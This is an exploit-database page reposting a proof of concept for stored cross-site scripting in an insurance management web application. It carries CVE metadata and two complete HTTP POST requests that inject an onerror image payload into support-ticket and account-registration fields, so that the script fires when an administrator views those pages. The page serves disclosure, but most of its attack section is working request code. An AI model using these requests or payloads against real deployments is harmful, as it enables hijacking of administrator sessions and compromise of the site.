Advertisement






Insurance Management System PHP And MySQL 1.0 Cross Site Scripting

CVE Category Price Severity
CVE-2021-38313 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2024-03-26
CPE
cpe:/a:exploitalert:insurance-management-system-php-and-mysql:1.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030059

Below is a copy:

Insurance Management System PHP And MySQL 1.0 Cross Site Scripting
# Exploit Title:Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS
# Date: 2024-02-08
# Exploit Author: Hakk TOKLU
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Version: 1.0
# Tested on: Windows 11 / PHP 8.1 & XAMPP 3.3.0

Support Ticket

Click on Support Tickets > Generate and add payload <img src=x onerror=prompt("xss")> to Subject and Description fields, then send the request. When admin visits the Support Tickets page, XSS will be triggered.

   Example Request : 
    POST /e-insurance/Script/user/core/new_ticket HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15; __insuarance__logged=1; __insuarance__key=LG3LFIBJCN9DKVXKYS41

category=4&subject=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&description=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&submit=1

Create Account

Click on New Account button on login page, then fill the fields. Inject <img src=x onerror=prompt("xss")> payloads to fname, lname, city and street parameter, then click Create Account button. XSS will be triggered when admin visits Users page.

Example Request : 
POST /e-insurance/Script/core/new_account HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 303
Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15

fname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&lname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&gender=Male&phone=5554443322&city=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&street=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&email=test1%40test.com&password=Test12345&submit=1
            

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.